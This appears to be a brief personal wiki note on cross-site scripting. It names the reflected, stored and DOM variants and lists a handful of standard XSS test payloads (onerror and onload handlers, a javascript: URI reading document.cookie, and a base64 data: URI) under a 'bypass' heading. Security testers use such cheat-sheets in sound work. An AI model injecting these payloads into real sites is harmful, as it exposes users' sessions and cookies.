Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-21T09:06:12-04:00

====== xss ======
Created Thursday 21 May 2020

cross site scripting

* reflected Xss
* Stored Xss
* Dom xss

The most common special characters used for this purpose include:
**< > ' " { } ;**

====== bypass ======

st choice is:
▲ <img src=x onerror=alert(1);> ▲
▲
**▲ <svg/onload=alert(1)>**
**<video src=x onerror=alert(1);>**
**<audio src=x onerror=alert(1);>**
▲ javascript:alert(document.cookie) ▲ data:text/html;base64,PHNjcmlwdD5h
bGVydCgnWFNTJyk8L3NjcmlwdD4=
